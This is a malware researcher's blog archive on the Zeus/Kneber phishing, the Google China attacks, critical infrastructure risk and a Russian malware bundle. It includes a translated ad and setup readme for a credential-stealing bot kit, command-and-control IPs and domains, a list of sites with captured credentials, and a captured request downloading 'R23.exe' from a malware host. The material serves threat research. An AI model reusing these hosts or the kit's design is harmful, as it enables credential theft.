Posts by nart

The “Kneber” Botnet, Spear Phishing Attacks and Crimeware



After I received an email from Jeff Carr warning about a spoofed email containing malware, I asked Jeff to send it along. It turns out that the attackers also used portions of a blog post by Brian Krebs as lure. What interesting is that the attack targeted .mil and .gov email addresses using text from Carr and Krebs about an earlier attack targeting .mil and .gov email addresses. A quick analysis of the sample indicated that it was Zeus and was beaconing to a known Zeus command and control server. However, the interesting part, for me, is what happened after getting compromised by Zeus, and I have to really thank Jeff for passing along the email because it led me to this stuff.

Around the same time news of the Kneber botnet broke and Netwitness linked the two attacks together. While much of the coverage of Kneber was hype-filled, the actual report by Netwitness is excellent and you can get a hype-free overview by Alex Cox, the guy who discovered it, here. The response of some of the AV vendors has been troubling. Essentially some said that this is nothing new, it’s just Zeus, and that there’s long been AV protection for Zeus. Netwitness responded stating that many AV’s actually did not detect the samples they analyzed.

The sample from the sample I analyzed the coverage was 18/41 on Virustotal.

The main issue for me was the use of Zeus to drop malware that focused on document removal and that it was used in conjunction with spear phishing attacks on .mil/gov email addresses. This second drop was 5/41 on Virustotal.

From the data it seems like the attackers were capturing whatever they could, not retrieving specific documents. That said, they managed to compromise the types of people they appeared to be after (in terms of who the phishing mails were sent to) and in a few cases managed to get some very interesting documents.

I think the broader issue is what Brian Krebs alluded to in the comments section of his blog – and Netwitness indicated this as well — that is if we believe that these crimeware types are squeezing all the monetary value they can out of their operations, what would they do with the type of information that has intelligence value but is not easily monetized in a traditional sense? And how better to obscure attribution that to use existing crimeware infrastructure for what appears to be more espionage that traditional crime?

I am keeping these as open questions because I am not sure how strong the connection is and tend to be cautious on these issues. But I do think it is an interesting case.

Read the full post here and here.

UPDATE: I’ve copied the report into this post.
More… »

Decrypting the Google statement



There have been many articles saying that Google is pulling out China. Well, that’s not exactly what Google said.

Here is exactly what Google stated:

We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

Google is not leaving China. At least not yet.

Look at what was actually said:

1) Google is not willing want to censor, so Google will 2) engage in discussion with the Chinese government and, 3) in order to operate an uncensored search engine within the law.

Law is the key word here. China’s Foreign Ministry spokesperson, Jiang Wu, stated:

China welcomes international Internet companies to conduct business within the country according to law

The question is, what law says that Google cannot index the web site of the BBC news? Anyone know?

In 2006 when Google started censoring google.cn in China I asked:

What specific law or court order is being complied with in China?

It is 2010, still no answer.

I think it is a reasonable question for Google to ask.

Chatter…



This post is my analysis of publicly information available on the attack against Google. I think that Google linked to my blog and the GhostNet report because of similarities in methods, not because the two cases are linked. This post combines my analysis of Google’s statement, media report and my experience with other attacks — that doesn’t mean that this is exactly what happened in the attack on Google.

There’s been a lot of chatter about how Google and 30+ other companies were compromised. Adobe has issued a statement saying that they too were compromised they still won’t say if attacks are in fact linked. Yahoo! stated that they were “aligned with Google” and it is now being reported that Yahoo! was among the other unnamed victims in the attack.

The timing of the compromise is interesting because it coincides with a 0day vulnerability in Adobe Reader. It has been suggested that this was the attack vector. The coincidence is interesting and I think that this claim is fairly credible.

UPDATE: McAfee reports that the compromise was an Internet Explorer 0day:

Our investigation has shown that Internet Explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7. Still, so far the attacks we’ve seen using this vector have been focused on Internet Explorer 6. Microsoft has been working with us on this matter and we thank them for their collaboration.

While we have identified the Internet Explorer vulnerability as one of the vectors of attack in this incident, many of these targeted attacks often involve a cocktail of zero-day vulnerabilities combined with sophisticated social engineering scenarios. So there very well may be other attack vectors that are not known to us at this time. That said, contrary to some reports our findings to date have not shown a vulnerability in Adobe Reader being a factor in these attacks.

iDefense has stated that they were able to investigate these attack since some of their customers were also hit:

IDefense was called in to help some of the victim companies that Google had uncovered. According to Jellenc, the hackers sent targeted e-mail messages to victims that contained a malicious attachment containing what’s known as a zero-day attack. These attacks are typically not detected by antivirus vendors because they exploit a previously unknown software bug.

“There is an attack exploiting a zero-day vulnerability in one of the major document types,” Jellenc said. “They infect whichever users they can, and leverage any contact information or any access information on the victim’s computer to misrepresent themselves as that victim.” The goal is to “infect someone with administrative access to the systems that hold the intellectual property that they’re trying to obtain,” he added.

The attack vector is very similar to GhostNet, but, it is a very common form of attack. Mikko Hypponen (who is awesome) told the BBC:

“This wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly. said Mikko Hypponen, of security firm F-Secure.

“Most companies just never go public,” he added.

“Human-rights activists are the biggest target,” said Mr Hypponen. “Everyone from Freedom for Tibet to Falun Gong supporters and those involved in Liberation of Taiwan are hit.”

I tend to agree. It is not the method of attack that is the story here, its the high profile of the victims and public disclosure by Google as well as Google decision to challenge China’s censorship that have made it so interesting. Really, we investigate these kind of attacks (usually on human rights activists) all the time.

In short, a user receives an email, possibly appearing to be from someone that they know who is a real person within his/her organization, with some text — sometimes specific, sometimes generic — that urges the user to open an attachment (or visit a web site) usually a PDF or Word Document (but other document types are also common). If the user open that attachment with a vulnerable version of Adobe Reader or Microsoft Office their computer will be compromised. The antivirus detection for these documents is usually relatively low and if the exploit is a 0day — an exploit for which there is no fox form the vendor available — the chances of compromise are very good.

After the user’s computer is compromised it “checks in” with a command and control server (C&C). These days it is most common for this check in to be an HTTP connection — it often looks like just another visit to a website — in which the compromised computer sends some information, usually an IP address and operating system etc… — and receives a command which it then executes. From there the attacker has full control of the system. The attacker can steal documents, email etc… force the compromised computer to download additional malware and use your infected computer as a mechanism to exploit your contacts or other computers on your network.

One of the things I like to track closely is the network infrastructure of the attackers — the location of their command and control servers as well as the mechanism of communication and other properties of the malware that allows for seemingly disparate attacks to be linked together. There has been some information published about the command and control servers used in the Google attack. James Mulvenon, who really knows his stuff, stated that the C&C’s were in Taiwan, the drop site for stolen stuff was on a US IP:

The attacks appear to have been launched from at least six Internet addresses located in Taiwan, which is a common strategy used by Chinese hackers to mask their origin, said James Mulvenon, director of the Center for Intelligence Research and Analysis at Defense Group Inc. a national-security firm.

They also hijacked the Internet address of a San Antonio-based firm, Rackspace, which is one of the largest Internet-hosting companies in the U.S. They siphoned off the stolen data from Google and other companies to the San Antonio site before sending it overseas, Mr. Mulvenon said. A Rackspace official said, “A server at Rackspace was compromised, disabled, and we actively assisted in the investigation of the cyber attack, fully cooperating with all affected parties.”

In addition, a dynamic DNS service was reportedly used:

iDefense obtained samples of the malicious code used in the July attack and the more recent one and found that although the malware was different in the two attacks, the programs both communicated with similar command-and-control servers. The servers each used the HomeLinux DynamicDNS to change their IP address, and both currently pointed to IP addresses belonging to a subset of addresses owned by Linode, a US-based company that offers Virtual Private Server hosting.

“The IP addresses in question are . . . six IP addresses apart from each other,” iDefense said in its statement. “Considering this proximity, it is possible that the two attacks are one and the same, and that the organizations targeted in the [recent] Silicon Valley attacks have been compromised since July.”

UPDATE: Apparently one of the pieces of malware used was the Hydraq Trojan.

And what did the attackers steal? Google stated that there was “theft of intellectual property”, some suggest that the attackers stole source code:

But according to iDefense, whose customers include some of the 33 companies that were hacked, the attacks were well targeted and “unusually sophisticated” and aimed at grabbing source code from several hi-tech companies based in Silicon Valley as well as financial institutions and defense contractors.

However, Google stated that the”primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” and that the attack was partially successful:

Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Others state that Google’s internal intercept systems were attacked:

That’s because they apparently were able to access a system used to help Google comply with search warrants by providing data on Google users, said a source familiar with the situation, who spoke on condition of anonymity because he was not authorized to speak with the press. “Right before Christmas, it was, ‘Holy s***, this malware is accessing the internal intercept [systems],’” he said.

Now some people have come forward, a Tibetan activist for example, saying that their email accounts had been breached.

Who is behind the attacks? Google didn’t really say who was behind the attacks . iDefense, who may be overreaching here, stated that it was the “Chinese state”:

“We confirmed with some clients and partners of ours in the defense contracting community that the IP addresses used to launch the attacks are known to be associated with previous attacks from groups that are either directly employed agents of the Chinese state or amateur hackers that are proxies for them that have attacked other U.S. companies in the past.”

In fact, attribution in these sorts of attacks is very difficult. Often people rely on the geolocation of an IP address — that’s not good enough. In these case the C&C’s were apparently in Taiwan and the drop site in the US. What does that tell us? Through piecing together seemingly disparate bits of information over time it is possible to make an educated guess. What makes the process difficult and tenuous is that the attackers might be quite different persons from those to ultimately exploit the data the attackers gather. It is the interpretation of the political dimensions of the attack that lead to a determination of who might ultimately have benefited the most form the attack, not technical evidence. Therefore there is room for a lot of uncertainty.

Google’s New Approach



Google has just announced that there were successful attacks against their infrastructure resulting in the theft of intellectual property. Google traced the attacks to China and although the attribution regarding the Chinese government is unclear, Google also discovered that the attackers also attempted to compromise the Gmail accounts of Chinese human rights activists.

But the most interesting result was due to the combination of attacks, surveillance and censorship Google has decided to reassess their operations in China:

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Wow.

The connection between censorship, surveillance and attacks is the key. Censorship, such as the blocking of web sites, is fairly crude but effective when combined with targeted surveillance and attacks. While many, especially the technically savvy, can circumvent China’s filtering system, the “GFW”, using tools such as Psiphon and Tor most Chinese citizens do not. The GFW doesn’t have to be 100% technically effective, it just has to serve as a reminder to those in China about what content is acceptable and that which should be avoided. The objective is to influence behaviour toward self-censorship, so that most will not actively seek out banned information of the means to bypass controls and access it.

The nexus of censorship, surveillance and malware attacks allows China is the key to China’s information control policies. It is not just about the GFW. Internet users in China face complex threats that are heavily dependent on additional factors, such as involvement in political activities, that involve targeted attacks and surveillance. China chooses when, where and how to exercise this granular control.

The InfoWar Monitor — which is a partnership between the Citizen Lab, Munk Centre for International Studies, University of Toronto and The SecDev Group (and SecDev.cyber which focuses on Internet threats) — has been focusing on these threats. For example, in a report “Breaching Trust: An analysis of surveillance and security practices on China’s TOM-Skype platform” we documented how Tom-Skype (the Chinese version of Skype) was censoring and capturing politically sensitive content. In “Tracking GhostNet: Investigating a Cyber Espionage Network” we documented targeted malware attacks that compromised over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

Google’s decision to re-asses their operations in China is courageous. I strongly hope that Microsoft, Yahoo! and others follow Google’s lead — as, to their credit, they have done in the past. In “Search Monitor Project: Toward a Measure of Transparency” I compared the censorship practices of Google, Yahoo! and Microsoft as well as the domestic Chinese search engine Baidu and found that all followed Google’s lead to some extent by at least disclosing their censorship practices to their users. I hope that they stand by Google.

China, the ball is in your court.

Malware Market



It’s no surprise that there is a malware market, an ecosystem of buyers, sellers and middlemen known as “guarantors”. In a very interesting post, “The botnet ecosystem“, Vitaly Kamluk explains the way in which this system works. There is a malware market in which malicious code and services are exchanged with the help of trusted third parties — usually administrators of popular forums. In addition, compromised hosts and stolen credentials are also exchanged.

Here’s a microcosm of this ecosystem that I stumbled upon recently. A member of a forum (forum.inattack.ru) called “Brainy” posts an add for a bot system that steals FTP and HTTPS credentials:

brainy

Here’s the Google translate version of a post by “brainy”:

[brainyframer], bot freymer \ Gruber \ sniffer
20.11.2009, 2:06

I offer you a bot freymer / sniffer / Graber my production [BrainyFramer]
This bot will be a good assistant to many who are professionally engaged cores.

Functional:
Graber-21 FTP client
FTP-sniffer with 37 different clients (web browsers including)
-HTTPS formgraber for IE (5,6,7,8) and FF. For snifa panel hosting (~ 120 different hosts)
-Freymer Semiconductors, distributed processing your list of FTP bots. High speed. Frame akov from the bot after snifa. Removal of foreign code.

Admin at work:
Screen

Progruzheno loader for 100 cars
Article: How to see otstuk 75%
Palimost build in test 4 AB.

____________________________

Price build: 400vmz
____________________________

[!] Everyone who bought a free upgrade.
[!] Change link for free.
[!] Questions, setting free too (IMG: http://html.forum.web-hack.ru/emoticons/smile.gif)
[!] Soft palitsya. I do not crypt. I give the contact person who does it.
[!] On Vista and windows 7 is not working.
————————————————– ———–

Answers to frequently asked questions:
——
Question: What palitsya. Traverses a firewall?
A: Soft works in the context of web browsers and FTP client system. If these applications have access to the network, the bot will work.
—–
Q: Why do little in the FTP log
Answer: It depends on your downloads. With 1K purchased downloads usually goes akkov 20-100. 0.5-1K Semiconductors with 1K of purchased downloads is a myth.
If you download from the dor. traffic Kay “download ftp client” then you understand that the FTS in the log will be more.
—–
Q: What about an exchange for …?
Answer: No, I do not need anything except money.
—–
Question: Is it possible to test?
Answer: I have no desire and time to make someone test. Soft checked in not only me alone.
—–

Asya> 3_5266891_7

brainy2

A forum administrator vouches for brainy, acting as the trsuted middleman or “guarantor”. Here’s the Google translate version:

Take this software is already long enough. All the alleged author of the software options – do. The author – an appropriate person with whom pleasant girl. Update issued on a regular basis. In general – I recommend.

On a server hosting some other nasty stuff including the Liberty exploit kit I found Brainy’s kit:

IP: 210.51.166.220

Domains:

bale.ws
ciao.ws
prefix.ws
hzone666.cn

Here is the readme file that comes with the bot:

Скрипты для [BrainyFramer]

0. conf.php – Настройки базы и рабочих линков
1. create.php – Создает таблицу
3. get.php – Дает боту настройки.
4. check.php – Админка
5. list.txt – Список фтп
6. \logs\ftp.log – Лог c фтп (права 755)
7. \logs\https.log – Лог c https (права 755)
8. grab.dll – Модуль грабера, не трогать!

Как установить эти скрипты?
——————————–
-Делаем настройку папки, чтобы поисковые боты не бегали по нашим файлам)
-Создаем базу данных для них, пишем настройки базы , также задаем логин и пасс на админку.
-Запускаем create.php, если все Ок с настройками , то будет надпись “Таблицы созданы”
-Загружаем список фтп акков (список должен быть в простом текст. формате) на сервер в папку с скриптами, имя файла со списком (поумолчанию list.txt) пишем в conf.php
——————————–

(с) Brainy 352668917

Google translate:

Scripts for [BrainyFramer]

0. conf.php – Base settings and working links
1. create.php – Creates a table
3. get.php – Gives the bot settings.
4. check.php – Admin
5. list.txt – List of Semiconductors
6. \ logs \ ftp.log – log c Semiconductors (Law 755)
7. \ logs \ https.log – log c https (Law 755)
8. grab.dll – Module Graber, do not touch!

How to install these scripts?
——————————–
-Makes setting up a folder to search bots did not run on our files)
-Creating a database for them, write the base configuration, is also asking login and pass on the admin panel.
Run-create.php, if everything is OK with the settings, it will be marked “Table created”
-Load the list of FTP akkov (list must be in plain text. Format) on the server in the folder with the script, the file name from the list (poumolchaniyu list.txt) write in conf.php
——————————–

(c) Brainy 352668917

brainy3

Today the list.txt (which contains compromised FTP accounts) has 528 entries. this list has varied over time at one time swelling to 100,000 entries, although many were duplicates. Also, many accounts were taken from public postings of compromised FTP accounts. (Nov 1 – 23632 list.txt, Nov 15 – 100000 list.txt).

The ftp.log file, which are FTP credentials that this instance of the BrainyFramer kit has captured contains 1684 entries. Many are local accounts, anonymous accounts and so on. The 528 entries in list.txt appear to be a cleaned up version of the entries in ftp.log.

The most interesting file is https.log which contains credentials captured from HTTPS sessions. This file is 2.8 MB and contains credentials captured from 2059 unique IP addresses.

infectedhosts

Credentials were captured for users with accounts on 125 sites:

ac-s8.mcafee-sms.com
adklik-adpartner.mynet.com
app.expressemailmarketing.com
applin0.hostedsitebuilder.com
apps.rackspace.com
appserver.5paisa.com
auth.mail.ru
billing.hostley.net
billing.justhost.com
bne003wm.server-secure.com
bolton.eukhost.com
cart.godaddy.com
club.panasonic.jp
dc-au.server-secure.com
domains.live.com
ea.onlineregister.com
echosting.cafe24.com
email.1and1.com
email.secureserver.net
email05.secureserver.net
firstfreedom.securepagehost.com
gator340.hostgator.com
gen.gmarket.co.kr
host1.medcohealth.com
host136.aessuccess.org
hotsms.www.hi.nl
htdatabase.fluidhosting.com
idp.godaddy.com
in.adserver.yahoo.com
intranic.nic.in
irenerobles.readyhosting.com
login.1und1.de
login.bluehost.com
login.hosted-commerce.net
login.mcafee-sms.com
mail.bsf.nic.in
mail.nextpharma.com.tr
mail.nic.in
mailhost.hrhgeology.com
mailserver2.security-forces.com
market.egitimonline.com
market.mynet.com
market.sealonline.co.kr
netac80.vie.hosting.nokia.com
onlinedoctor.lloydspharmacy.com
p2.secure.hostingprod.com
partner.allianz.hu
passport.yandex.ru
portal.bsh-partner.com
rbserver.achievacu.com
rdserver.rd.go.th
register.btinternet.com
register.dailymail.co.uk
register.facebook.com
register.go.com
register.hp.com
register.metro.co.uk
register.outspark.com
register.perfectworld.com
register.remedylife.com
register.scansoft.com
registration.lycos.com
rni.nic.in
secure.domain.com
secure.hostelbookers.com
secure.odlmarkets.com
secure.server101.com
secure.turhost.com
secure.turkishost.com
secure01.bankhost.com
server.iad.liveperson.net
server.lon.liveperson.net
server.ylos.com
server10.dollarsonthenet.net
server11.dollarsonthenet.net
server12.dollarsonthenet.net
server7.dollarsonthenet.net
server8.dollarsonthenet.net
server9.dollarsonthenet.net
serverfarm.pubblica.istruzione.it
sitemail.hostway.com
smsforlife.matssoft.co.uk
sponsorlusms.turkcell.com.tr
sprint.ehosts.net
srv25.trwww.com
secure.turhost.com
suze.ucs.louisiana.edu
webhosting.icicibank.com
webmail-au.server-secure.com
webmail.makromarket.net
webmail.ruc.dk
webmailcluster.perfora.net
webserver.afyon.bel.tr
webserver.zeytinburnu.bel.tr
websms.djezzy.com
www.adbrite.com
www.bostonmarketjobs.com
www.cart32hostingred.com
www.domaindiscount24.net
www.foundationapi.com
www.garantiserver.com
www.gmarket.co.kr
www.gmarket.com.sg
www.godaddy.com
www.handelsregister.de
www.hc.ru
www.host.net.tr
www.hostelsclub.com
www.jetsms.net
www.kaynaksms.com
www.limitsizhosting.com
www.lloydspharmacy.com
www.members.hostiga.com
www.nic.lv
www.nic.ru
www.nic.tr
www.register.bilgi.edu.tr
www.smsodyssey-a01.com
www.speakerrepair.com
www.teknoserver.net
www.topmarketer.net
www.voshost.com
www.webmarket.com.tr
www.webmarketplace.de
www.websms.com.tr
www1.soriana.com

The .ws registrar has suspended the domain names, the Chinese CERT appears to have taken action against the command and control server residing in their IP space, and AusCERT has been a great help with notification. (And thanks to Jose Nazario too).

Thoughts on Critical Infrastructure Protection



In a very interesting paper for the International Risk Governance Council, Ortwin Renn describes a framework that provides an “analytic structure for investigating and supporting the treatment of risk issues.” Renn argues that risks are “mental ‘constructions’” in which actors link signals from the real world with “experience of actual harm” along with “the belief that human action can prevent harm in advance.” Therefore, how actors come to understand threats and risks is critical for it affects risk governance. Renn defines “risk governance” as follows:

On a national scale, governance describes structures and processes for collective decision-making involving governmental and non-governmental actors (Nye and Donahue 2000). Governing choices in modern societies is seen as an interplay between governmental institutions, economic forces and civil society actors (such as NGOs). At the global level, governance embodies a horizontally organised structure of functional self-regulation encompassing state and non-state actors bringing about collectively binding decisions without superior authority (cf. Rosenau 1992; Wolf 2002).

Renn suggests that there are four phases of of risk governance: pre-assessment, appraisal, tolerability and acceptability judgement, and management. My interest at this point is in the pre-assessment phase. How do we come to understand the nature of cyber threats to critical infrastructure (CI) and how do we assess the risks it poses? Framing is a critical component of the pre-assessment phase for it determines what information is relevant, and how risk is perceived. It shapes how we come to understand threat, and indicates a direction of action.

Framing

Cyber threats, and in particular cyber threats relating to CI, have been largely framed in polar opposite extremes.

On one end of the continuum we have those who believe cyber threats to be nothing more than a nuisance. It is not uncommon to hear “our systems are well protected”, followed by “everyone gets a virus every now and then” and finally “well, our critical systems are firewalled, air-gapped, not connected to the Internet.” In this case threats are treated as “standalone” cases that are largely technical in nature.

From such a perspective, technical considerations take precedence over who might be behind the attacks, what the motivations of the attackers are, and the what the consequences of cyber intrusions are — for example, what could the attackers have done with the level of access obtained, or the documents stolen, and contacts harvested. This results in under estimated risk, de-prioritization, and sometimes even inaction.

On the other side you’ll hear that China/Russia/Hackers – whatever the flavour of the day is – have thoroughly infiltrated CI and can “shut down the electrical grid” or “crash airplanes into one another” or … insert catastrophe here.

From this perspective, political persuasions concerning attribution are prioritized over technical considerations. The scenarios used to illustrate the threat are often ill-conceived, and do not reflect the technical and operation environments they are meant to address. Rather than focus on “boring” details, this perspective seeks to lay blame on external sources. This results in over estimated risk, sometimes resulting in disbelief and therefore inaction, or when it does spur action, often focuses on the wrong threats.

For example, some often quote the case of the Australian sewage hacker. An attacker managed to compromise a waste management system near Brisbane, Australia and intentionally caused millions of litres of raw sewage to spill out over the suburb of Sunshine Coast. Many, including the WSJ, suggest, “what if hackers located in China or Russia were able to conduct attacks like this here?”

Well, it turns out that the “hacker” in this case was an insider: he was “employed by the company that had installed the system” that he later “hacked” and he had specialized knowledge of the system. Moreover, the attack did not occur over the Internet, in fact the attacker issued commands over radio and had to be within a 25 mile radius – something that doesn’t apply to hackers operating out of China or Russia. Security solutions focusing solely on external threats would not have protected this installation in this case.

Re-framing the problem reveals a much more complex threat landscape. CI faces “integrated threats” which encompass the intersection of cyberspace and “meatspace”. The “cyber” threat is not purely digital. Nor is the threat limited to only emergencies or catastrophic events.

CI encompasses the private and public sectors and is increasingly reliant on Internet connectivity (in some capacity). Government relies on networks operated by private firms, which contract with other private firms and so on. “Ownership” of the cyber security process is distributed across all the entities responsible for the setup and installation of these systems, through to operations and maintenance.

In addition, individual operations are reliant on others – something that the Northeast Blackout of 2003 demonstrated so vividly. The operations of Canadian CI were negatively impacted due to the operations of, in this case a foreign, operation.

This same lesson applies to cyberspace.

Therefore defence needs to be conceptualized not just in terms of firewalls and IDS but also the security of the operations at each stage (computer security, software security, the tools used during installation, remote access for maintenance, and connection from “trusted” operators) as well as the “insider” threat.

The good thing is that this re-framing is occurring. There are now a variety of public documents that serve as an early warning of the potential threat CI faces – I’ll briefly discuss two of them:

1. A report by the Department of Transportation’s Inspector General that documents a variety of attacks against and vulnerabilities in the FAA’s air traffic control system (May 2009)

2. A report commissioned by the Department of Energy investigating common cyber security vulnerabilities control systems (November 2008)

Early Warning

The DOE report documented successful attacks that have affected FAA networks . In 2006 the FAA shutdown a “portion of its ATC systems in Alaska” due to a “viral attack” and in 2008 FAA computers, again in Alaska, were compromised and 40,000 username and passwords were stolen. In 2009 a “a FAA public-facing Web application computer” was compromised leading to the theft of “PII on 48,000 current and former FAA employees.”

Vulnerabilities were found during an audit in various web-applications that would have allowed attackers to access the data stored on those computers – this included public facing systems such as those which list “communications frequencies for pilots and controllers” as well as internal systems used by the FAA:

  • Unauthorized access was gained to information stored on Web application computers associated with the Traffic Flow Management Infrastructure System, Juneau Aviation Weather System, and the Albuquerque Air Traffic Control Tower;
  • Unauthorized access was gained to an ATC system used to monitor critical power supply at six en route centers; and
  • Vulnerability found on Web applications associated with the Traffic Flow Management Infrastructure system was confirmed, which could allow attackers to install malicious codes on FAA users’ computers.

Accoring to the report, “[t]his occurred because (1) Web applications were not adequately configured to prevent unauthorized access and (2) Web application software with known vulnerabilities was not corrected in a timely matter by installing readily available security software patches released to the public by software vendors.”

The report on common cyber security vulnerabilities in control systems for the DOE identified similar issues along with serious issues concerning the use of plain text communications protocols and the lack of security surrounding remote access systems. The report found:

“If compromised, an attacker could utilize these systems to cause catastrophic damage or outages directly or by exploiting paths to critical end devices or connected SCADA systems.”

Typically the network environment is divided into a “business LAN” and a “control system LAN” with a firewall in between. Sometimes, a DMZ, is created to share data between the corporate and control system LANs.

The report found that:

  • Firewall and router filtering deficiencies include access to control system components through external and internal networks. (Unrestricted telnet access allowed to DMZ network equipment and misconfigured VPNs and that remote desktop passwords were common between security zones (corporate and control system networks)
  • It was possible to escalate privileges from a non-control system application remotely published by the display application to a control system application.
  • A malicious user who has physical access to an unsecured port on a network switch could plug into the network behind the firewall to defeat its incoming filtering protection.

A very interesting theme throughout the report was the focus on remote, trusted endpoints. The report found that the Inter-Control Center Communications Protocol (ICCP), “an open protocol used internationally in the electric power industry to exchange data among utilities, regional transmission operators, independent power producers, and others” uses plain text and that such connections should be treated as “untrustworthy” and placed in a separate DMZ.

In other words, operators within the industry treat remote connections between them as trustworthy, bypassing the security procedures in place. This means that even if your operation is relatively secure, an attacker may be able to bypass it by compromising a less secure peer.

Determining risk in cyberspace is difficult. Attacks occur everyday.

Attackers may be highly skilled and well resourced adversaries or simply opportunistic amateurs. Some are professional cyber criminals, others are motivated by politics or status within their community. Still others may be engaged in espionage or data theft and have ties to state governments. Attacks may be largely symbolic, intended to intimidate, or they may aim to cause disruption or destruction.

An attack that may seem insignificant may have much larger consequences.

Knowing the degree of risk posed by attackers — ascertaining the “who” and “why” — is critical for mounting an effective response. To be clear, understanding why an attack occurred should not be used as an excuse such as “why would anyone attack poor old me” to limit or restrict corrective measures. Rather, it is used to situate the attack in a broader perspective which may indicate why the target was chosen and what the attacks may aim to do with the information/data they have extracted.

Understanding a single attack is only one component of establishing a complete threat picture.

In order to develop a better understanding of the rapidly changing risks and threats in cyberspace, ongoing monitoring and analysis is required. Rather than a static assessment, or a singular incident response, such threat mapping is better conceptualized as an iterative interrogation process in which old and new data are examined for meaningful relationships and new evidence.

Cyber threats to CI exist, don’t get me wrong, but the the emphasis need not be on an unlikely catastrophic event like “cyber-Katrina” or a “cyber-911” or a “digital-Pearl Harbor.” There are numerous vulnerabilities to be exploited, they probably are being exploited.

The good news is that they are often remedied through the implementation of best security practices. The bad news is that “boring” security concerns do not capture the imagination of policy makers and bureaucrats responsible for committing resources to fix security issues.

Still, this is not an excuse to conjure up fiction, even if the goal is to spur corrective action in the right direction.

We need to find the right framing that captures the attention of policy makers but that accurately reflects the threats and vulnerabilities to CI.

We need to change the perception of security as something that’s brought in to “fix” an emergency or as a response to catastrophe. It needs to be part of the development, implementation, and operation of CI. Considering the sorry state of affairs, I do think that scenarios can be useful tools to help policy makers understand the nature of the threat. However, they need to be realistic – they need to reflect the operational environment of CI. If they are just hype they are in the best case just useless and in the worse case actually a detriment.

Adventures in Russian Malware



I just posted an analysis of a pcap file from a political figure. While I expected to find targeted malware tat was possibly associated with political activities, I found a bunch of Russian/Ukrainian malware. What I found interesting, and which seems to match what key security community folks are seeing (here and here), is a “bundling” of malware. In this case, a Black Energy bot was bundles with with the “Oficla/Sasfis” Trojan downloader as well as RogueAV (Win32.FakeScanti).

Another interesting issues was the use of Chinese IP addresses by the Russian malware (which given the political figure whose computer was infected, Chinese IP addresses were contextually relevant). This is certainly not new, (see here, here etc…) but I think it hits home the point that simply relying on GeoIP to determine attribution and/or motivation is misguided.

I tried to link part of this operation to someone who appears to be some sort of “middleman” who propagates a variety of malware. There are a variety of posts on forums by “rundll32″ in which he advertises an “affiliate program” that “is not detected by any antivirus.” In the ad he uses the domain rundll32.ru which is registered to “rundll32@yandex.ru” which was also used by Alexander V. Prokhorov (or Prochorov) in a paper submitted at Moscow State University.

I find the relationships between the various groups and how different individuals and groups within the malware ecosystem get ultimately paid very interesting.

Russian Malware Bundle



by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.

Background

In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attack to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact this appears to be the case for a variety of botnets. Dancho Danchev states groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraged “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate eachother’s malware or use what FireEye calls a “BotnetWeb” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types.

The infected computer connected to four control servers:

sexigood.ru (daro-x@yandex.ru)
81.176.232.103 – NEOWEB HOSTING, RU

091809.ru (bazhenov@mail.ru)
210.51.166.238 – China Netcom, CN

zflaersroot.cn (tem.ponakuru@mail.ru)
210.51.166.233 – China Netcom, CN

moneybizness.ru (belov@pisem.net)
210.51.10.184 – China Netcom, CN

The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103) and a file “ R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0
Host: sexigood.ru

